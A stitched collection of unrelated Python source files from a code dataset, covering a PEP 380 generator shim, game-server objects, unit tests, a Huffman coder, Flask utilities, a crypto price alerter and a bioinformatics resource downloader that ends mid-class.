"""Implements PEP 380. Use as:
@supergenerator
def genfunct(*args):
try:
sent1 = (yield val1)
,,,
retval = yield _from(iterator)
...
except Exception, e:
# caller did generator.throw
pass
finally:
pass # closing
"""
@_wraps(genfunct)
def wrapper(*args, **kwargs):
gen = genfunct(*args, **kwargs)
try:
# if first poll of gen raises StopIteration
# or any other Exception, we propagate
item = gen.next()
# OUTER loop
while True:
# yield _from(EXPR)
# semantics based on PEP 380, Revised**12, 19 April
if isinstance(item, _from):
_i = item.iterator
try:
# first poll of the subiterator
_y = _i.next()
except StopIteration, _e:
# subiterator exhausted on first poll
# extract return value
_r = _e.args if _e.args else (None,)
else:
# INNER loop
while True:
try:
# yield what the subiterator did
_s = (yield _y)
except GeneratorExit, _e:
# close the subiterator if possible
try:
_close = _i.close
except AttributeError:
pass
else:
_close()
# finally clause will gen.close()
raise _e
except BaseException:
# caller did wrapper.throw
_x = _exc_info()
# throw to the subiterator if possible
try:
_throw = _i.throw
except AttributeError:
# doesn't attempt to close _i?
# if gen raises StopIteration
# or any other Exception, we propagate
item = gen.throw(*_x)
_r = None
# fall through to INTERSECTION A
# then to OUTER loop
pass
else:
try:
_y = _throw(*_x)
except StopIteration, _e:
_r = _e.args if _e.args else (None,)
# fall through to INTERSECTION A
# then to INTERSECTION B
pass
else:
# restart INNER loop
continue
# INTERSECTION A
# restart OUTER loop or proceed to B?
if _r is None: break
else:
try:
# re-poll the subiterator
if _s is None:
_y = _i.next()
else:
_y = _i.send(_s)
except StopIteration, _e:
# subiterator is exhausted
# extract return value
_r = _e.args if _e.args else (None,)
# fall through to INTERSECTION B
pass
else:
# restart INNER loop
continue
# INTERSECTION B
# done yielding from subiterator
# send retvalue to gen
# if gen raises StopIteration
# or any other Exception, we propagate
item = gen.send(_r[0])
# restart OUTER loop
break
# traditional yield from gen
else:
try:
sent = (yield item)
except Exception:
# caller did wrapper.throw
_x = _exc_info()
# if gen raises StopIteration
# or any other Exception, we propagate
item = gen.throw(*_x)
else:
# if gen raises StopIteration
# or any other Exception, we propagate
item = gen.send(sent)
# end of OUTER loop, restart it
pass
finally:
# gen raised Exception
# or caller did wrapper.close()
# or wrapper was garbage collected
gen.close()
return wrapper
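# Illustrative usage (Python 2 syntax, matching this module; not part of the
# original code): yielding a _from(...) wrapper delegates to the sub-iterator,
# emulating PEP 380's "yield from".
if __name__ == "__main__":
    @supergenerator
    def outer():
        yield 'start'
        yield _from(iter([1, 2, 3]))
        yield 'end'
    print list(outer())  # ['start', 1, 2, 3, 'end']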
|
StarcoderdataPython
|
4834107
|
from panda3d.core import *
from direct.distributed import DistributedSmoothNodeAI
from toontown.toonbase import ToontownGlobals
from otp.otpbase import OTPGlobals
from direct.fsm import FSM
from direct.task import Task
class DistributedCashbotBossObjectAI(DistributedSmoothNodeAI.DistributedSmoothNodeAI, FSM.FSM):
wantsWatchDrift = 1
def __init__(self, air, boss):
DistributedSmoothNodeAI.DistributedSmoothNodeAI.__init__(self, air)
FSM.FSM.__init__(self, 'DistributedCashbotBossObjectAI')
self.boss = boss
self.reparentTo(self.boss.scene)
self.avId = 0
self.craneId = 0
def cleanup(self):
self.detachNode()
self.stopWaitFree()
def delete(self):
self.cleanup()
DistributedSmoothNodeAI.DistributedSmoothNodeAI.delete(self)
def startWaitFree(self, delayTime):
waitFreeEvent = self.uniqueName('waitFree')
taskMgr.remove(waitFreeEvent)
taskMgr.doMethodLater(delayTime, self.doFree, waitFreeEvent)
def stopWaitFree(self):
waitFreeEvent = self.uniqueName('waitFree')
taskMgr.remove(waitFreeEvent)
def doFree(self, task):
if not self.isDeleted():
self.demand('Free')
p = self.getPos()
h = self.getH()
self.d_setPosHpr(p[0], p[1], 0, h, 0, 0)
return Task.done
def getBossCogId(self):
return self.boss.doId
def d_setObjectState(self, state, avId, craneId):
self.sendUpdate('setObjectState', [state, avId, craneId])
def requestGrab(self):
avId = self.air.getAvatarIdFromSender()
if self.state != 'Grabbed' and self.state != 'Off':
craneId, objectId = self.__getCraneAndObject(avId)
if craneId != 0 and objectId == 0:
self.demand('Grabbed', avId, craneId)
return
self.sendUpdateToAvatarId(avId, 'rejectGrab', [])
def requestDrop(self):
avId = self.air.getAvatarIdFromSender()
if avId == self.avId and self.state == 'Grabbed':
craneId, objectId = self.__getCraneAndObject(avId)
if craneId != 0 and objectId == self.doId:
self.demand('Dropped', avId, craneId)
def hitFloor(self):
avId = self.air.getAvatarIdFromSender()
if avId == self.avId and self.state == 'Dropped':
self.demand('SlidingFloor', avId)
def requestFree(self, x, y, z, h):
avId = self.air.getAvatarIdFromSender()
if avId == self.avId:
self.setPosHpr(x, y, 0, h, 0, 0)
self.demand('WaitFree')
def hitBoss(self, impact):
pass
def removeToon(self, avId):
if avId == self.avId:
self.doFree(None)
return
def __getCraneAndObject(self, avId):
if self.boss and self.boss.cranes != None:
for crane in self.boss.cranes:
if crane.avId == avId:
return (crane.doId, crane.objectId)
return (0, 0)
def __setCraneObject(self, craneId, objectId):
if self.air:
crane = self.air.doId2do.get(craneId)
if crane:
crane.objectId = objectId
def enterGrabbed(self, avId, craneId):
self.avId = avId
self.craneId = craneId
self.__setCraneObject(self.craneId, self.doId)
self.d_setObjectState('G', avId, craneId)
def exitGrabbed(self):
self.__setCraneObject(self.craneId, 0)
def enterDropped(self, avId, craneId):
self.avId = avId
self.craneId = craneId
self.d_setObjectState('D', avId, craneId)
self.startWaitFree(10)
def exitDropped(self):
self.stopWaitFree()
def enterSlidingFloor(self, avId):
self.avId = avId
self.d_setObjectState('s', avId, 0)
if self.wantsWatchDrift:
self.startWaitFree(5)
def exitSlidingFloor(self):
self.stopWaitFree()
def enterWaitFree(self):
self.avId = 0
self.craneId = 0
self.startWaitFree(1)
def exitWaitFree(self):
self.stopWaitFree()
def enterFree(self):
self.avId = 0
self.craneId = 0
self.d_setObjectState('F', 0, 0)
def exitFree(self):
pass
|
StarcoderdataPython
|
1643041
|
<reponame>pymir3/pymir3
import mir3.data.base_object as bo
import mir3.data.metadata as md
class DataObject(bo.BaseObject):
"""Standard base for interface objects.
Provides some methods to make it easier to develop interface objects.
Attributes:
metadata: object of type Metadata with information about the data
stored.
data: any kind of data the derived class wants to use.
"""
def __init__(self, metadata=None):
"""Initializes metadata to given value and data to None.
The metadata isn't copied, so any modifications affect both objects.
Args:
metadata: Metadata object to associate with this interface. Default:
None.
"""
super(DataObject, self).__init__()
# Defines a valid metadata
if metadata is not None:
self.metadata = metadata
else:
self.metadata = md.Metadata()
# Default data
self.data = None
|
StarcoderdataPython
|
1704259
|
<reponame>matheusccouto/palpiteiro<filename>tests/test_palpiteiro_draft.py
""" Unit-tests for palpiteiro.draft """
import os
import time
import pandas as pd
import pytest
import palpiteiro
import palpiteiro.data
import palpiteiro.draft
THIS_FOLDER = os.path.dirname(__file__)
# Get clubs.
clubs = palpiteiro.data.get_clubs_with_odds(
"1902",
cache_folder=os.path.join(THIS_FOLDER, "data"),
cache_file="betting_lines.json",
)
# Initialize Cartola FC API.
cartola_fc_api = palpiteiro.data.CartolaFCAPI()
# Players.
players = palpiteiro.create_all_players(cartola_fc_api.players(), clubs)
players = [player for player in players if player.status in [2, 7]]
players = [player for player in players if pd.notna(player.club.win_odds)]
# Schemes.
schemes = palpiteiro.create_schemes(cartola_fc_api.schemes())
class TestRandomLineUp:
""" Test random_line_up function."""
def test_is_valid(self):
""" Test if generated line up is valid. """
line_up = palpiteiro.draft.random_line_up(players, schemes, 1e6)
assert line_up.is_valid(schemes)
def test_is_expensive(self):
"""
Test if it raises an error when it is impossible to create a team with the
available money.
"""
with pytest.raises(RecursionError):
palpiteiro.draft.random_line_up(players, schemes, 0)
def test_affordable(self):
""" Make sure all line ups generated are below max price."""
prices = [
palpiteiro.draft.random_line_up(players, schemes, 70).price
for _ in range(100)
]
assert max(prices) <= 70
def test_perfomance(self):
""" Test if it runs functions 100 times in less than a second. """
start = time.time()
for _ in range(100):
palpiteiro.draft.random_line_up(players, schemes, 1e6)
end = time.time()
assert end - start < 1 # seconds
class TestMutateLineUp:
""" Unit tests for mutate_line_up function. """
@classmethod
def setup_class(cls):
""" Setup class. """
cls.line_up = palpiteiro.draft.random_line_up(
players=players, schemes=schemes, max_price=1e6
)
def test_not_equal(self):
""" Check that the mutated line up is not equal. """
new_line_up = palpiteiro.draft.mutate_line_up(
line_up=self.line_up, players=players, schemes=schemes, max_price=1e6,
)
assert new_line_up != self.line_up
def test_perfomance(self):
    """ Test if it runs the function 1000 times in less than a second. """
start = time.time()
for _ in range(1000):
palpiteiro.draft.mutate_line_up(self.line_up, players, schemes, 1e6)
end = time.time()
assert end - start < 1 # seconds
class TestCrossoverLineUp:
""" Unit tests for crossover_line_up function. """
@classmethod
def setup_class(cls):
""" Setup class. """
cls.line_up1 = palpiteiro.draft.random_line_up(
players=players, schemes=schemes, max_price=1e6
)
cls.line_up2 = palpiteiro.draft.random_line_up(
players=players, schemes=schemes, max_price=1e6
)
def test_perfomance(self):
""" Test if it runs functions 100 times in less than a second. """
start = time.time()
for _ in range(100):
palpiteiro.draft.crossover_line_up(
line_up1=self.line_up1, line_up2=self.line_up2, max_price=1e6
)
end = time.time()
assert end - start < 1 # seconds
class TestDraft:
""" Unit tests for draft class. """
def test_duplicates(self):
""" Make sure there aren't duplicates on the final team. """
best_line_up = palpiteiro.draft.draft(
individuals=200,
generations=100,
players=players,
schemes=schemes,
max_price=1e6,
tournament_size=5,
)
players_ids = [player.id for player in best_line_up]
assert len(players_ids) == len(set(players_ids))
def test_draft(self):
""" Test main functionality. """
best_line_up = palpiteiro.draft.draft(
individuals=200,
generations=100,
players=players,
schemes=schemes,
max_price=100,
tournament_size=5,
)
assert best_line_up.points > 0
def test_convergence(self):
""" Test if it converges to a single solution. """
line_ups = [palpiteiro.draft.draft(
individuals=100,
generations=1000,
players=players,
schemes=schemes,
max_price=100,
tournament_size=5,
) for _ in range(2)]
assert line_ups[0] == line_ups[-1]
|
StarcoderdataPython
|
1704757
|
#!/usr/bin/env python3
import sys
import collections
from operator import itemgetter
from queue import PriorityQueue
__author__ = "<NAME>"
__license__ = "MIT"
class Node:
def __init__(self, left=None, right=None, value=None):
self.left = left
self.right = right
self.value = value
@classmethod
def as_leaf(cls, value):
return cls(None, None, value)
def leafs(self):
return self.left, self.right
def __lt__(self, other):
if not self.value:
return self.left < other
elif not other.value:
return self < other.left
else:
return self.value < other.value
def create_huffman_coding(freqs):
q = PriorityQueue()
for value in freqs:
q.put((value[1], Node.as_leaf(value[0])))
while q.qsize() > 1:
l, r = q.get(), q.get()
node = Node(l[1], r[1])
q.put((l[0] + r[0], node))
return q.get()
def walk_tree(node, prefix="", code=None):
    # Use None as the default to avoid sharing one mutable dict across calls.
    if code is None:
        code = {}
if node.left.value is None:
walk_tree(node.left, prefix + "0", code)
else:
code[node.left.value] = prefix + "0"
if node.right.value is None:
walk_tree(node.right, prefix + "1", code)
else:
code[node.right.value] = prefix + "1"
return code
def main():
"""
"""
chars = list(sys.stdin.read().strip())
freq = collections.Counter(chars)
root = create_huffman_coding(freq.most_common())
code = walk_tree(root[1])
s = sorted(code.items(), key=itemgetter(0), reverse=False)
for char, encoding in s:
print("{} {}".format(char, encoding))
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
3309183
|
# -*- coding: utf-8 -*-
# Author: hpf
# Date: 2020/3/1 10:31 AM
# File: utils.py
# IDE: PyCharm
import datetime
import ipaddress, glob, json, os, jwt
import random
import redis
import bcrypt
from jwt import ExpiredSignatureError, InvalidTokenError
from flask import jsonify, current_app
from werkzeug.http import HTTP_STATUS_CODES
from webargs import ValidationError
from backend.models import HostGroup, PlayBook, Environment, Category
from backend.settings import playbook_dir, Operations, POOL
from backend.extensions import db, redis_conn
def isAlnum(word):
"""
    Check that the string consists only of ASCII letters and digits (excluding non-ASCII characters such as Chinese).
:param word:
:return:
"""
try:
return word.encode('ascii').isalnum()
except UnicodeEncodeError:
return False
def gen_token(user, operation, expire_in=None, **kwargs):
"""
    Generate a JWT token.
    :param operation: operation type
    :param expire_in: expiry time in seconds
:param user_id:
:return:
"""
if not expire_in:
expire_in = current_app.config.get('AUTH_EXPIRE')
data = {
    "user_id": user.id,
    "operation": operation,
    "exp": int(datetime.datetime.now().timestamp()) + expire_in  # expiry timestamp
}
data.update(**kwargs)
token = jwt.encode(data, current_app.config.get("SECRET_KEY"), 'HS256').decode()
return token
def validate_token(user, token, operation, new_password=None):
    """Validate a token."""
try:
data = jwt.decode(token, current_app.config.get("SECRET_KEY"), algorithms=['HS256'])
except (ExpiredSignatureError, InvalidTokenError):
return False
if operation != data.get('operation') or user.id != data.get('user_id'):
return False
if operation == Operations.CONFIRM:
user.confirmed = True
elif operation == Operations.RESET_PASSWORD:
user.password = <PASSWORD>(new_password.encode(), bcrypt.gensalt())
else:
return False
db.session.commit()
return True
def validate_ip(val):
    """Validate the IP address."""
try:
ip = ipaddress.ip_address(val)
if ip.is_loopback or ip.is_multicast or ip.is_reserved:
raise ValueError
except ValueError as e:
raise ValidationError("非法的IP地址")
def validate_json(val):
    """Validate JSON format."""
try:
print(val)
json.loads(val)
except ValueError:
raise ValidationError("json格式错误")
def validate_playbook(val):
    """Check that the playbook file exists."""
os.chdir(playbook_dir)
file_list = glob.glob('*.y*ml')
if val not in file_list:
raise ValidationError("playbook文件不存在")
def validate_group_id(val):
gid = HostGroup.query.get(val)
if not gid:
raise ValidationError("主机组不存在")
def validate_playbook_id(val):
pid = PlayBook.query.get(val)
if not pid:
raise ValidationError("playbook不存在")
def validate_env_id(val):
pid = Environment.query.get(val)
if not pid:
raise ValidationError("环境参数错误")
def validate_category_id(val):
cid = Category.query.get(val)
if not cid:
raise ValidationError("分类不存在")
def api_abort(code, message=None, **kwargs):
if message is None:
message = HTTP_STATUS_CODES.get(code, '')
response = jsonify(code=code, message=message, **kwargs)
response.status_code = code
return response
def gen_captcha():
    """Generate a captcha string."""
tmp_list = []
for i in range(4):
u = chr(random.randint(65, 90))  # uppercase letter
l = chr(random.randint(97, 122))  # lowercase letter
n = str(random.randint(0, 9))  # digit
tmp = random.choice([u, l, n])
tmp_list.append(tmp)
return "".join(tmp_list), tmp_list
def get_random_color():
    """Return a random RGB color tuple."""
return random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)
def validate_capcha(cap_id, user_cap):
    """Validate the captcha entered by the user."""
capcha = redis_conn.get(cap_id)
if not capcha: return False
print(capcha.decode())
if user_cap.lower() == capcha.decode():
return True
else:
return False
def get_task_progress(task_obj):
    """Get the execution progress of a task."""
percentage = 0
total_step = PlayBook.query.filter(PlayBook.name == task_obj.playbook).first().step
progress = True if total_step else False
# Finished tasks report 100% progress
if task_obj.state.code == 2:
percentage = 100
return progress, percentage
# Handle tasks that have not finished yet
over_task_count = redis_conn.llen(task_obj.ansible_id)
if total_step:
percentage = round((over_task_count / total_step) * 100)
return progress, percentage
def model_to_dict(result):
from collections.abc import Iterable
# After the conversion, drop the special '_sa_instance_state' attribute
try:
if isinstance(result, Iterable):
tmp = [dict(zip(res.__dict__.keys(), res.__dict__.values())) for res in result]
for t in tmp:
t.pop('_sa_instance_state')
else:
tmp = dict(zip(result.__dict__.keys(), result.__dict__.values()))
tmp.pop('_sa_instance_state')
return tmp
except BaseException as e:
print(e.args)
raise TypeError('Type error of parameter')
|
StarcoderdataPython
|
1695094
|
# -*- coding: utf-8 -*-
# Visualization of the behaviour of the squared-error function in regression
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import seaborn as sns
# +
plt.style.use('fivethirtyeight')
plt.rcParams['font.family'] = 'sans-serif'
plt.rcParams['font.serif'] = 'Ubuntu'
plt.rcParams['font.monospace'] = 'Ubuntu Mono'
plt.rcParams['font.size'] = 10
plt.rcParams['axes.labelsize'] = 10
plt.rcParams['axes.labelweight'] = 'bold'
plt.rcParams['axes.titlesize'] = 10
plt.rcParams['xtick.labelsize'] = 8
plt.rcParams['ytick.labelsize'] = 8
plt.rcParams['legend.fontsize'] = 10
plt.rcParams['figure.titlesize'] = 12
plt.rcParams['image.cmap'] = 'jet'
plt.rcParams['image.interpolation'] = 'none'
plt.rcParams['figure.figsize'] = (16, 8)
plt.rcParams['lines.linewidth'] = 2
plt.rcParams['lines.markersize'] = 8
colors = ['xkcd:pale orange', 'xkcd:sea blue', 'xkcd:pale red', 'xkcd:sage green', 'xkcd:terra cotta', 'xkcd:dull purple', 'xkcd:teal', 'xkcd:goldenrod', 'xkcd:cadet blue',
'xkcd:scarlet']
# -
# define a vector of colors
colors = sns.color_palette("husl", 4)
# declare some graphical properties of the figure
sns.set(style="darkgrid", context='paper', palette=colors, rc={"figure.figsize": (16, 8),'image.cmap': 'jet', 'lines.linewidth':.7})
# read the data into a pandas dataframe
data = pd.read_csv("../dataset/cars.csv", delimiter=',', header=0, names=['X','y'])
# compute the number of data points
n = len(data)
# display the data with a scatter plot
fig = plt.figure()
fig.patch.set_facecolor('white')
ax = fig.gca()
ax.scatter(data['X'], data['y'], s=40,c='r', marker='o', alpha=.5)
plt.xlabel(u'Velocità in mph', fontsize=14)
plt.ylabel('Distanza di arresto in ft', fontsize=14)
plt.show()
# Extract the feature array X from the dataframe and append a column of ones to it
X=np.array(data['X']).reshape(-1,1)
X = np.column_stack((np.ones(n), X))
# Extract the target-value array t from the dataframe
t=np.array(data['y']).reshape(-1,1)
# show how the mean squared error varies with the coefficients
# set of values considered for the coefficients
w0_list = np.linspace(-100, 100, 100)
w1_list = np.linspace(-100, 100, 100)
# create a grid of value pairs
w0, w1 = np.meshgrid(w0_list, w1_list)
# define the function to evaluate at every point of the grid
def error(v1, v2):
theta = np.array((v1, v2)).reshape(-1, 1)
e=(np.dot(X,theta)-t)
return np.dot(e.T,e)[0,0]/(2*n)
v_error=np.vectorize(error)
e=v_error(w0,w1).T
fig = plt.figure()
fig.patch.set_facecolor('white')
ax = fig.gca(projection='3d')
surf=ax.plot_surface(w0, w1, e, rstride=1, cstride=1, cmap=plt.cm.jet , linewidth=0, antialiased=True)
ax.tick_params(axis='x', labelsize=8)
ax.tick_params(axis='y', labelsize=8)
ax.tick_params(axis='z', labelsize=8)
plt.xlabel(r"$w_0$", fontsize=12)
plt.ylabel(r"$w_1$", fontsize=12)
plt.title(r"Errore quadratico medio al variare dei coefficienti $w_0,w_1$", fontsize=12)
fig.colorbar(surf, shrink=0.5, aspect=7, cmap=plt.cm.jet)
plt.show()
fig = plt.figure(figsize=(12,12))
fig.patch.set_facecolor('white')
ax = fig.gca()
im = plt.imshow(e, origin='lower', extent=(w0_list.min(),w0_list.max(),w1_list.min(), w1_list.max()), aspect='auto',alpha=.8)
#plt.contour(w0, w1, e,color='r', lw=0.7)
ax.tick_params(axis='x', labelsize=8)
ax.tick_params(axis='y', labelsize=8)
plt.xlabel(r"$w_0$", fontsize=12)
plt.ylabel(r"$w_1$", fontsize=12)
plt.title(r"Errore quadratico medio al variare dei coefficienti $w_0,w_1$", fontsize=12)
fig.colorbar(im, shrink=0.5, aspect=7, cmap=plt.cm.jet)
plt.show()
|
StarcoderdataPython
|
3296246
|
<filename>python/isogram/isogram_test.py
import unittest
from isogram import is_isogram
# Tests adapted from `problem-specifications//canonical-data.json` @ v1.6.0
class IsogramTest(unittest.TestCase):
def test_empty_string(self):
self.assertIs(is_isogram(""), True)
def test_isogram_with_only_lower_case_characters(self):
self.assertIs(is_isogram("isogram"), True)
def test_word_with_one_duplicated_character(self):
self.assertIs(is_isogram("eleven"), False)
def test_word_with_one_duplicated_character_from_end_of_alphabet(self):
self.assertIs(is_isogram("zzyzx"), False)
def test_longest_reported_english_isogram(self):
self.assertIs(is_isogram("subdermatoglyphic"), True)
def test_word_with_duplicated_character_in_mixed_case(self):
self.assertIs(is_isogram("Alphabet"), False)
def test_word_with_duplicated_letter_in_mixed_case_lowercase_first(self):
self.assertIs(is_isogram("alphAbet"), False)
def test_hypothetical_isogrammic_word_with_hyphen(self):
self.assertIs(is_isogram("thumbscrew-japingly"), True)
def test_isogram_with_duplicated_hyphen(self):
self.assertIs(is_isogram("six-year-old"), True)
def test_made_up_name_that_is_an_isogram(self):
self.assertIs(is_isogram("<NAME>"), True)
def test_duplicated_character_in_the_middle(self):
self.assertIs(is_isogram("accentor"), False)
def test_same_first_and_last_characters(self):
self.assertIs(is_isogram("angola"), False)
# Additional tests for this track
def test_isogram_with_duplicated_letter_and_nonletter_character(self):
self.assertIs(is_isogram("Aleph Bot Chap"), False)
if __name__ == '__main__':
unittest.main(exit=False)
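# One possible implementation consistent with the tests above (an illustrative
# sketch, not the canonical solution for this exercise):
#
#   def is_isogram(string):
#       letters = [c.lower() for c in string if c.isalpha()]
#       return len(letters) == len(set(letters))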
|
StarcoderdataPython
|
112701
|
from requests import Request, Session
from requests.exceptions import ConnectionError, Timeout, TooManyRedirects
import json
import time, datetime
import sys
import schedule
global is_test
is_test = False
def check_crypto(config_json, last_sent):
print("Debug: Job Started " + str(datetime.datetime.utcnow()))
total_message = ""
special_message = ""
data = get_cmcprices(config_json)
if not data:
return
if not "data" in data:
return
for crypto in data["data"].values():
for quote_key in crypto["quote"]:
if quote_key != "USD":
continue
quote = crypto["quote"][quote_key]
total_message += crypto["symbol"] + ": " + str(quote["price"]) + "\n"
if not "checks" in config_json:
continue
for checker in config_json["checks"]:
if crypto["symbol"] != checker["symbol"]:
continue
if checker["type"] == "lowerthan" and quote["price"] < checker["value"]:
if not checker["name"] in last_sent or not last_sent[checker["name"]]:
special_message += "{0} price has plummeted below {1}.\n".format(checker["symbol"], checker["value"])
last_sent[checker["name"]] = True
elif checker["type"] == "greaterthan" and quote["price"] > checker["value"]:
if not checker["name"] in last_sent or not last_sent[checker["name"]]:
special_message += "{0} price has risen above {1}.\n".format(checker["symbol"], checker["value"])
last_sent[checker["name"]] = True
else:
last_sent[checker["name"]] = False
print(total_message)
if special_message != "":
if is_test:
print("message (not sent):" + special_message)
else:
message_pushover(special_message, config_json)
sys.stdout.flush()
sys.stderr.flush()
def get_cmcprices(config_json):
url = config_json["cmcurl"]
parameters = {
'symbol':'BTC,ETH,BNB,USDT,ADA,DOGE'
}
headers = {
'Accepts': 'application/json',
'X-CMC_PRO_API_KEY': config_json["cmckey"],
}
session = Session()
session.headers.update(headers)
try:
data = {}
if is_test:
with open("test.json", "r") as check_file:
data = json.loads(check_file.read())
else:
response = session.get(url, params=parameters)
data = json.loads(response.text)
return data
except (ConnectionError, Timeout, TooManyRedirects) as e:
print(e)
return None
def message_pushover(message, config_json):
url = config_json["pushoverurl"]
parameters = {
'token': config_json["pushovertoken"],
'user': config_json["pushoveruser"],
'message': message
}
headers = {
'Accepts': 'application/json'
}
session = Session()
session.headers.update(headers)
try:
response = session.post(url, params=parameters)
data = json.loads(response.text)
except (ConnectionError, Timeout, TooManyRedirects) as e:
print(e)
def main():
args = sys.argv[1:]
if "-test" in args:
global is_test
is_test = True
config_json = {}
last_sent = {}
with open("config.json", "r") as check_file:
config_json = json.loads(check_file.read())
check_crypto(config_json, last_sent)
if is_test:
schedule.every(5).seconds.do(lambda: check_crypto(config_json, last_sent))
else:
schedule.every(20).minutes.do(lambda: check_crypto(config_json, last_sent))
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
1675927
|
<filename>protmapper/resources.py
import os
import csv
import zlib
import boto3
import logging
import argparse
import requests
import botocore
from ftplib import FTP
from io import BytesIO, StringIO
from urllib.request import urlretrieve
from . import __version__
logger = logging.getLogger('protmapper.resources')
# If the protmapper resource directory does not exist, try to create it
home_dir = os.path.expanduser('~')
resource_dir = os.path.join(home_dir, '.protmapper', __version__)
if not os.path.isdir(resource_dir):
try:
os.makedirs(resource_dir)
except Exception:
logger.warning(resource_dir + ' already exists')
def _download_from_s3(key, out_file):
s3 = boto3.client('s3',
config=botocore.client.Config(
signature_version=botocore.UNSIGNED))
tc = boto3.s3.transfer.TransferConfig(use_threads=False)
# Path to the versioned resource file
full_key = 'protmapper/%s/%s' % (__version__, key)
s3.download_file('bigmech', full_key, out_file, Config=tc)
def _download_ftp_gz(ftp_host, ftp_path, out_file=None, ftp_blocksize=33554432):
ftp = FTP(ftp_host)
ftp.login()
gzf_bytes = BytesIO()
ftp.retrbinary('RETR %s' % ftp_path,
callback=lambda s: gzf_bytes.write(s),
blocksize=ftp_blocksize)
ret = gzf_bytes.getvalue()
ret = zlib.decompress(ret, 16+zlib.MAX_WBITS)
if out_file is not None:
with open(out_file, 'wb') as f:
f.write(ret)
return ret
def download_phosphositeplus(out_file, cached=True):
logger.info("Note that PhosphoSitePlus data is not available for "
"commercial use; please see full terms and conditions at: "
"https://www.psp.org/staticDownloads")
_download_from_s3('Phosphorylation_site_dataset.tsv', out_file)
def download_uniprot_entries(out_file, cached=True):
if cached:
_download_from_s3('uniprot_entries.tsv', out_file)
return
columns = ['id', 'genes(PREFERRED)', 'entry%20name', 'database(RGD)',
'database(MGI)', 'length', 'reviewed', 'feature(SIGNAL)']
columns_str = ','.join(columns)
logger.info('Downloading UniProt entries')
url = 'http://www.uniprot.org/uniprot/?' + \
'sort=id&desc=no&compress=no&query=reviewed:yes&' + \
'format=tab&columns=' + columns_str
logger.info('Downloading %s' % url)
res = requests.get(url)
if res.status_code != 200:
logger.info('Failed to download "%s"' % url)
reviewed_entries = res.content
url = 'http://www.uniprot.org/uniprot/?' + \
'sort=id&desc=no&compress=no&query=reviewed:no&fil=organism:' + \
'%22Homo%20sapiens%20(Human)%20[9606]%22&' + \
'format=tab&columns=' + columns_str
logger.info('Downloading %s' % url)
res = requests.get(url)
if res.status_code != 200:
logger.info('Failed to download "%s"' % url)
unreviewed_human_entries = res.content
if not((reviewed_entries is not None) and
(unreviewed_human_entries is not None)):
return
unreviewed_human_entries = unreviewed_human_entries.decode('utf-8')
reviewed_entries = reviewed_entries.decode('utf-8')
lines = reviewed_entries.strip('\n').split('\n')
lines += unreviewed_human_entries.strip('\n').split('\n')[1:]
# At this point, we need to clean up the gene names.
logger.info('Processing UniProt entries list.')
for i, line in enumerate(lines):
if i == 0:
continue
terms = line.split('\t')
# If there are multiple gene names, take the first one
gene_names = terms[1].split(';')
terms[1] = gene_names[0]
# Join the line again after the change
lines[i] = '\t'.join(terms)
# Join all lines into a single string
full_table = '\n'.join(lines)
logger.info('Saving into %s.' % out_file)
with open(out_file, 'wb') as fh:
fh.write(full_table.encode('utf-8'))
def download_uniprot_sec_ac(out_file, cached=True):
if cached:
_download_from_s3('uniprot_sec_ac.txt', out_file)
return
logger.info('Downloading UniProt secondary accession mappings')
url = 'ftp://ftp.uniprot.org/pub/databases/uniprot/knowledgebase/' + \
'docs/sec_ac.txt'
urlretrieve(url, out_file)
def download_hgnc_entries(out_file, cached=True):
if cached:
_download_from_s3('hgnc_entries.tsv', out_file)
return
logger.info('Downloading HGNC entries')
url = 'http://tinyurl.com/y83dx5s6'
res = requests.get(url)
if res.status_code != 200:
logger.error('Failed to download "%s"' % url)
return
logger.info('Saving into %s' % out_file)
with open(out_file, 'wb') as fh:
fh.write(res.content)
def download_swissprot(out_file, cached=True):
if cached:
_download_from_s3('uniprot_sprot.fasta', out_file)
return
logger.info('Downloading reviewed protein sequences from SwissProt')
ftp_path = ('/pub/databases/uniprot/current_release/knowledgebase/'
'complete/uniprot_sprot.fasta.gz')
_download_ftp_gz('ftp.uniprot.org', ftp_path, out_file)
def download_isoforms(out_file, cached=True):
if cached:
_download_from_s3('uniprot_sprot_varsplic.fasta', out_file)
return
logger.info('Downloading isoform sequences from Uniprot')
ftp_path = ('/pub/databases/uniprot/current_release/knowledgebase/'
'complete/uniprot_sprot_varsplic.fasta.gz')
_download_ftp_gz('ftp.uniprot.org', ftp_path, out_file)
def download_refseq_seq(out_file, cached=True):
if cached:
_download_from_s3('refseq_sequence.fasta', out_file)
return
ftp_path = ('/refseq/H_sapiens/annotation/GRCh38_latest/'
'refseq_identifiers/GRCh38_latest_protein.faa.gz')
_download_ftp_gz('ftp.ncbi.nlm.nih.gov', ftp_path, out_file)
def download_refseq_uniprot(out_file, cached=True):
if cached:
_download_from_s3('refseq_uniprot.csv', out_file)
return
logger.info('Downloading RefSeq->Uniprot mappings from Uniprot')
ftp_path = ('/pub/databases/uniprot/current_release/knowledgebase/'
'idmapping/by_organism/HUMAN_9606_idmapping.dat.gz')
mappings_bytes = _download_ftp_gz('ftp.uniprot.org', ftp_path,
out_file=None)
logger.info('Processing RefSeq->Uniprot mappings file')
mappings_io = StringIO(mappings_bytes.decode('utf8'))
csvreader = csv.reader(mappings_io, delimiter='\t')
filt_rows = []
for up_id, other_type, other_id in csvreader:
if other_type == 'RefSeq':
filt_rows.append([other_id, up_id])
# Write the file with just the RefSeq->UP mappings
with open(out_file, 'wt') as f:
csvwriter = csv.writer(f)
csvwriter.writerows(filt_rows)
RESOURCE_MAP = {
'hgnc': ('hgnc_entries.tsv', download_hgnc_entries),
'upsec': ('uniprot_sec_ac.txt', download_uniprot_sec_ac),
'up': ('uniprot_entries.tsv', download_uniprot_entries),
'psp': ('Phosphorylation_site_dataset.tsv', download_phosphositeplus),
'swissprot': ('uniprot_sprot.fasta', download_swissprot),
'isoforms': ('uniprot_sprot_varsplic.fasta', download_isoforms),
'refseq_uniprot': ('refseq_uniprot.csv', download_refseq_uniprot),
'refseq_seq': ('refseq_sequence.fasta', download_refseq_seq),
}
class ResourceManager(object):
"""Class to manage a set of resource files.
Parameters
----------
resource_map : dict
A dict that maps resource file IDs to a tuple of resource file names
and download functions.
"""
def __init__(self, resource_map):
self.resource_map = resource_map
def get_resource_file(self, resource_id):
"""Return the path to the resource file with the given ID.
Parameters
----------
resource_id : str
The ID of the resource.
Returns
-------
str
The path to the resource file.
"""
